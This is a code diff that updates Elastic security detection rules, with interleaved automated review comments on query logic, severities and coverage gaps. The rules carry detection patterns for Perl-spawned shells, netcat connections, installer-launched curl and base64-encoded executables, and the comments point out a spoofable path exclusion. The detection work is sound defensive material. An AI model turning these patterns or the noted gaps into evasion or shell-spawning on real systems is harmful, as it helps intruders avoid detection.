"technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } 
+ ] + } ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json index 094b87f33ada7..7ecd9d999b8aa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json @@ -16,6 +16,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8", "severity": "low", @@ -59,7 +81,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -73,5 +95,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json index 59121f44e8fce..7847ad4e559a5 100644 
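Review bot: The `note` still points analysts to the `Process Execution from an Unusual Directory` rule, but this same change deletes that rule (`execution_from_unusual_directory.json`, rule_id `ebfe1448-7fac-4d59-acea-181bd89b1f7f`), so the cross-reference now dangles, and the backticks enclose the word "rule" as if it were part of the name; either drop the sentence or name whatever rule supersedes it. The new parent exclusion `"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe"` allow-lists a wildcarded path under a temp directory that is typically user-writable, so anything placed at a matching path can launch `cmd.exe` against the suspicious directories without firing; if the agent populates `process.parent.code_signature.*`, keying the exclusion on a trusted signer rather than a path would be harder to spoof. The rewritten path list also silently drops `C:\\Users\\Default\\*`, `C:\\Windows\\ServiceProfiles\\*`, `C:\\Windows\\Web\\*` and `C:\\Windows\\assembly\\*` compared with the old query, a coverage reduction worth stating in the commit message.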
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json @@ -15,6 +15,33 @@ "https://objective-see.com/blog/blog_0x43.html", "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "080bc66a-5d56-4d1f-8071-817671716db9", "severity": "high", @@ -60,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json similarity index 51% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json index 1746a813563d8..0b51ac5405712 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json 
@@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies when the built in macOS Installer program generates a network event after attempting to install a .pkg file. This activity has been observed being leveraged by malware.", + "description": "Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package.", "false_positives": [ "Custom organization-specific macOS packages that use .pkg files to run cURL could trigger this rule. If known behavior is causing false positives, it can be excluded from the rule." ], 
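Review bot: The new description says the rule "should indicate the installation of a malicious or suspicious package", which overstates what the `false_positives` entry right below concedes (custom organisation packages that run cURL trigger it too); "may indicate" keeps the two consistent. Wording nits in the same string: "MacOS" should be "macOS" as used in the rule's tags, and "e.g bash" / "e.g curl" should be "e.g., bash" / "e.g., curl".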
@@ -12,13 +12,46 @@ ], "language": "eql", "license": "Elastic License v2", - "name": "macOS Installer Spawns Network Event", - "query": "sequence by process.entity_id with maxspan=1m\n [process where event.type == \"start\" and host.os.family == \"macos\" and\n process.parent.executable in (\"/usr/sbin/installer\", \"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer\") ]\n [network where not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "name": "MacOS Installer Package Spawns Network Event", + "query": "sequence by host.id, user.id with maxspan=30s\n[process where event.type == \"start\" and event.action == \"exec\" and process.parent.name : (\"installer\", \"package_script_service\") and process.name : (\"bash\", \"sh\", \"zsh\", \"python\", \"osascript\", \"tclsh*\")] \n[network where event.type == \"start\" and process.name : (\"curl\", \"osascript\", \"wget\", \"python\")] \n", "references": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings", - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + "https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520", + "https://github.com/D00MFist/Mystikal" ], - "risk_score": 47, + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 74, "rule_id": "99239e7d-b0d4-46e3-8609-acafcf99f68c", "severity": "medium", "tags": [ @@ -26,7 +59,8 @@ "Host", "macOS", "Threat Detection", - "Execution" + "Execution", + "Command and Control" ], "threat": [ { @@ -75,5 +109,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json similarity index 68% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json index fc7cc406a7fbd..f5a4af4d23987 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json @@ -20,6 +20,23 @@ "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", "https://en.wikipedia.org/wiki/Netcat" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f", "severity": "medium", 
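Review bot: The new sequence is joined only `by host.id, user.id`, whereas the old query joined `by process.entity_id`, so the network stage is no longer tied to the installer's child process at all: any `curl`, `wget`, `python` or `osascript` connection by the same user within 30 seconds of a legitimate package's post-install shell script will satisfy the sequence, which is likely to be the dominant source of noise. Constraining the second stage by lineage (for example `process.parent.name : ("bash", "sh", "zsh", ...)` or, if the agent populates it, joining on `process.parent.entity_id`) would keep the intent of "script spawned by installer then reaches out" without the cross-process coupling. Separately, `"risk_score": 74` with `"severity": "medium"` does not follow the scale the other rules in this diff use (47 for medium, 73 for high), and the `:` matches on `"python"` in both stages are exact rather than wildcarded, so a `python3` interpreter will not match if that is intended.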
@@ -27,8 +44,26 @@
 "Elastic",
 "Host",
 "Linux",
- "Threat Detection"
+ "Threat Detection",
+ "Execution"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/"
+ }
+ ]
+ }
 ],
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json
similarity index 59%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json
index 27fa1a548e963..e452d106cd8d6 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json
@@ -25,8 +25,33 @@
 "Host",
 "Windows",
 "Threat Detection",
- "ML"
+ "ML",
+ "Execution"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.001",
+ "name": "PowerShell",
+ "reference": "https://attack.mitre.org/techniques/T1059/001/"
+ }
+ ]
+ }
+ ]
+ }
 ],
 "type": "machine_learning",
- "version": 5
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json index 3108c9c02f170..4d0407c46f7b0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json 
@@ -15,6 +15,38 @@ "name": "Execution of File Written or Modified by Microsoft Office", "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft Office\n\nMicrosoft Office is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently\ntargeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result\nof the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect\nsuspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. 
Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence with maxspan=2h\n [file where event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where event.type in (\"start\", \"process_started\")] by host.id, process.executable\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5", "severity": "high", @@ -64,5 +96,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } 
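Review bot: The Microsoft Office rule in this hunk still pairs `"risk_score": 21` with `"severity": "high"`, while the otherwise parallel PDF-reader rule two hunks down pairs `73` with `"high"`; the mismatch predates this commit, but since the rule's version is bumped here anyway it is a good moment to align the pair (`"risk_score": 73`, or `"severity": "low"` if the lower score is the intent). Separately, the new `required_fields` lists the fields spelled out in the EQL text but not `event.category`, which the `file where` / `process where` category filters depend on. If the list is meant to be exhaustive for data-availability checks, consider adding it here and in the PDF-reader hunk, where the same gap appears; the process-id-file hunk below appears to follow the same pattern, though its query lies outside that hunk. The query-type rules in this commit do list `event.category`, so the EQL rules are currently the odd ones out.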
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json
index a74fb9e92765f..a7507ddfff56f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json
@@ -15,6 +15,43 @@ "name": "Execution of File Written or Modified by PDF Reader", "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by PDF Reader\n\nPDF is a common file type used in corporate environments and most machines have software to \nhandle these files. This creates a vector where attackers can exploit the engines and technology behind this class of\nsoftware for initial access or privilege escalation.\n\nThis rule searches for executable files written by PDF reader software and executed in sequence. This is most likely the\nresult of exploitation for privilege escalation or initial access. This rule can also detect suspicious processes masquerading as\nPDF readers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the PDF documents received and opened by the user that could cause this behavior. 
Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. 
This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence with maxspan=2h\n [file where event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"AcroRd32.exe\" or\n process.name : \"rdrcef.exe\" or\n process.name : \"FoxitPhantomPDF.exe\" or\n process.name : \"FoxitReader.exe\") and\n not (file.name : \"FoxitPhantomPDF.exe\" or\n file.name : \"FoxitPhantomPDFUpdater.exe\" or\n file.name : \"FoxitReader.exe\" or\n file.name : \"FoxitReaderUpdater.exe\" or\n file.name : \"AcroRd32.exe\" or\n file.name : \"rdrcef.exe\")\n ] by host.id, file.path\n [process where event.type in (\"start\", \"process_started\")] by host.id, process.executable\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "1defdd62-cd8d-426e-a246-81a37751bb2b", "severity": "high", @@ -64,5 +101,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json
index 77537be3f1cbb..412ea7fc406ee 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json
@@ -15,6 +15,28 @@
 "references": [
 "https://github.com/neoneggplant/EggShell"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "41824afb-d68c-4d0e-bfee-474dac1fa56e",
 "severity": "high",
@@ -26,7 +48,31 @@
 "Threat Detection",
 "Execution"
 ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.006",
+ "name": "Python",
+ "reference": "https://attack.mitre.org/techniques/T1059/006/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json
index 0f1e857232e40..80db1a45544e3 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json
@@ -12,6 +12,28 @@
 "license": "Elastic License v2",
 "name": "Interactive Terminal Spawned via Perl",
 "query": "event.category:process and event.type:(start or process_started) and process.name:perl and\n process.args:(\"exec \\\"/bin/sh\\\";\" or \"exec \\\"/bin/dash\\\";\" or \"exec \\\"/bin/bash\\\";\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3",
 "severity": "high",
@@ -41,5 +63,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json
index 4d43c1c64ee60..ab59015c37677 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json
@@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk,\nbypassing file-based security protections. These executables are generally base64 encoded.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk,\nbypassing file-based security protections. These executables are generally base64 encoded.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
